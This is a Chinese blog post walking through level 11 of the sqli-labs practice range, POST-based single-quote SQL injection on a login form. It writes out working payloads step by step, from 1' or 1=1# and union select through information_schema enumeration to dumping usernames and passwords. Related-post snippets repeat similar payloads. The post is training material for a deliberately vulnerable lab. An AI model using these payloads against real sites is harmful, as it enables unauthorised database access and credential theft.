sqli-labs关卡11(基于post提交的单引号闭合的字符型注入)通关思路

已于 2024-01-16 19:51:28 修改
阅读量618 收藏 7
点赞数 4
分类专栏: sqli-labs靶场 文章标签: sql web安全
于 2023-11-06 22:56:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyh1588/article/details/134255967
版权

文章目录

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾前十关

前十关是基于get提交的sql注入。sql注入按照注入点类型又分为数字型,字符型。按照回显类型又分为有回显的简单sql注入和无回显的盲注以及报错注入。从这一关开始是post提交的sql注入了,让我们看看有什么不一样的地方吧。

二、第十一关要了解的知识

1、get请求与post请求的区别(从sql注入角度)

1、get请求

get请求一般提交参数是在url显现出来,比如前10关的共同点是网址后面都会加上参数?id=1。像这种直接把提交参数在url显现的是get请求。get请求一般出现在搜索查询的地方,比如常见的淘宝搜索商品界面。

2、post

post请求与get请求相反,不会把提交参数显示到url中。而是提交到表单中,一般参数是看不到的,要通过抓包。post请求一般出现在可以修改和提交数据的地方,比如登录框。

3、总结

post请求比get请求相对安全一些,提交参数不会显示到url,更具有隐蔽性

三、靶场第十一关通关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、爆显位位置
  • 4、爆数据库名
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

首先看到页面是一个登录框,明显是post类型的页面。使用万能语句1 or 1=11 or 1=2发现页面正常,所以排除数字型。输入1'发现页面报错(如图一所示)

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ‘1’ LIMIT 0,1’ at line 1
图一

那么再试一下(如图二、三所示)

1' or 1=1#

1' or 1=2#

发现1=2页面异常报错,1=1正常。所以是单引号闭合。
图二所示
如图三
注意:这里不用and用or是因为短路原则,因为and是一假为假,两真为真。而且这里我们是不知道参数是啥(账号密码不知道)所以A and B,的A九成是假的(因为你不知道账号密码)如果A为假,那么就不会识别B了(B是我们注入语句)。不懂的看我靶场第一关讲解。
还有就是注入语句不一定只能在username进行,password也行。只要与数据库有交互,还有可控参数的话就能都试一试。

2、爆字段个数

注入语句为

1' order by 3#

发现3时报错,说明显位有两个。(如图所示)
在这里插入图片描述

3、爆显位位置

注入语句为

1' union select 1,2#

发现显位是1,2.(如图所示)
在这里插入图片描述

4、爆数据库名

注入语句为

1' union select user(),database()#

在这里插入图片描述
成功爆出数据库名为security,用户为root@localhost,版本号自己用version()查询就行了。

5、爆数据库表名

注入语句为

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

得到表有emails,referers,uagents,users.其中users有关键信息的概率大。(如图所示)
在这里插入图片描述

6、爆数据库列名

注入语句为

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"#

得到所有列名(如图所示)
在这里插入图片描述

7、爆数据库数据

注入语句为

1' union select group_concat(username),group_concat(password) from users #

如图所示
在这里插入图片描述

总结

从这一关起开始是post类型的sql注入了,不再是get类型了。但是注入过程都是差不多的。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

无名小卒且不会安全的zzyyhh
关注
专栏目录
sqli-labs靶场】第11
qq_61019688的博客
04-26 835
知道了sql语句,接下来就是构造sql语句来进行查询,例如1’ or 1=1#(注意此处不能再使用and来构造恒真语句,因为我们不知道username和password,所以要想判断sql语句是否执行要使用or,这样or后面的语句为true则执行,为false则报错)(还有一个注意点的此处不能再用--+来注释,要使用#)1’ order by 2#,无返回内容,由此可以判断出列数应该是2,对于为啥order by 2无内容返回因为是可能不存在username=1,所以查不到内容。1’ or 1=2#报错。
sqli-labs 第十一关
weixin_67813445的博客
02-16 334
11关出现登录框,发现是基于post进行的注入,我们可以用burrp suit来进行抓包,也可以选用hackbar的post方式
sqli-labs-----第11
wyzhxhn的博客
11-09 1923
基于错误的POST单引号字符注入
sqli-labs靶场通关攻略(11-15关)
最新发布
Nai_zui_jiang的博客
08-19 426
进入网页在输入框输入 1' 发现会有报错因为这里是POST方式提交的,不能直接修改,这里有三种选择1、使用可以POST提交的插件,例如Firefox中的HackBar2、使用Burpsuite抓包后,然后修改3、直接在输入框中注入咱们使用手工输入,会发现username和password会回显1,2那么我们就可以通过这里来查询他的数据库了输入下面这条语句查询出数据库名security查询表名查询user里所有的列最后查询表格的所有数据。
SQLI-labs-第十一关和第十二关
weixin_54055099的博客
04-28 1142
Sqli-labs的第11关和12关,有关POST方式的联合查询注入
sqli-labs第十一关
yuqnqi的博客
05-08 200
进入目录D:\LeStoreDownload\phpStudyjiayou\phpstudy_pro\WWW\sqli-labs-master\Less-11。试试其他的吧 username=1' or '1'='1 password=1' order by 2#因为1=1为永真式,与前面的or结合,再加上注释符注释掉and后面的语句,where后语句直接为真。URL中%27是单引号',%23是井号#尝试使用万能登录 1' or 1=1#第一步,判断闭合方式嘛,单引号闭合。输入1' or 1=1#
Sqli-labs靶场11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1484
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符注入)
luosaierdadi的博客
07-09 256
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选中post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
sqli-labs实验指导手册
11-17
- **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单引号闭合。 - **确定列数**:通过`order by`语句,增加数字看何时会报错。 - **显示字段定位**:利用`union select`结合不同的列数来确定可...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1965
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间盲注(Time-based blind)
sqli-lab教程——Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)
luosaierdadi的博客
06-28 438
输入单引号,页面报错,如下图所示根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,猜想:咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,多余的步骤不多说了,直接开始爆数据吧。注意 id=非正确值爆库payload?id=-1' union select 1,2,database() --+得到‘security’库名爆表payload?id=-1' unio
sql报错注入-sqli-labs第11
weixin_46784800的博客
11-03 583
获取数据的操作 判断是否为字符注入 passwd=1' or '1'='1 &uname=1' or '1'='1 输入post参数判断是否为字符注入 判断数据库中含有多少列 通过查询语句: uname=1'or 1=1 order by 3 -- -&passwd=1' or 1=1 -- - 可发现报错:Unknown column ‘3’ in ‘order clause’,则可说明查询的数据库中只有两列,则可确定后续的联合查询的参数数量。 判断界面输出与数据库的接口
Sqlilabs-11
KAKA的博客
07-07 293
从第 11 关开始我们进入了 POST 环节,什么是 POSTPOST 就是数据从客户端提交到服务端,例如在这个关卡中,我们就是将用户名和密码以表单的形式提交给服务器,然后服务器再进行验证。 如图,在 Hackbar 我们需要构造 uname passwd submit 三样东西,其实这跟我们做的第一关没什么差别,只是换了个地方构造 payload 而已,或者你可以不用 hackbar ,直接在输入框里输入构造 payload 也是可以的。 这里就以 hackbar 为例构造 payload: .
sqli-labs第11-20关
永远相信美好的事情即将发生
12-15 3855
Less-11 进入后是个登录页面,应该是基于post注入,这边准备用hackbar注入,方便一点。看一下源码,两个框的名字分别是uname和passwd 先提交1试试效果 登陆失败,再加一个单引号试试,密码框不输(若是输入密码,报错出来的信息更少;也可同时输入单双引号,这个效果一样) 有报错回显,存在注入,且回显的错误为:‘1’’ and password=’’ LIMIT 0,1。其中1’是我输进去的,另外还有成对的单引号出现,可以看出是字符。由此猜测sql语句为:select usernam
Sqli-Labs(第11关~第42关)通关笔记
weixin_54894046的博客
11-16 1176
sql注入lesson-11~31
sqli-labs基础篇 第11~17关
Lucky小小吴的小屋
01-23 1438
sqli-labs基础篇 第11~17关
sqli-labs第十一关、第十二关
qq_51366383的博客
12-07 448
从第十一关开始需要使用bp,我这里的都是用的repeater操作的。 判断闭合符 uname=admin’ --+&passwd=admin&submit=Submit 通过下面的对比可以看到这个是有回显出来的 uname=admin" --+&passwd=admin&submit=Submit 判断列数 uname=admin’ order by 2 --+&passwd=admin&submit=Submit 判断回显位 uname=admin’
sqli-labs 11-20关
sy15890481860的博客
02-09 651
sqli-labs 11-20关 Less-11: 从这一关开始就进入了post的世界 进入页面 随便输入出现报错信息 我们在输入框输入万能密码尝试一下admin'or'=1'#,密码随意。返回正确的结果。 详情看上篇文章 Less-12: 闭合方式") Less-13: 闭合方式**’)**。这里可以用下布尔类的盲注。猜数据库的第一位,然后挨着对每一位进行测试。 Less-14: 双引号闭...
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值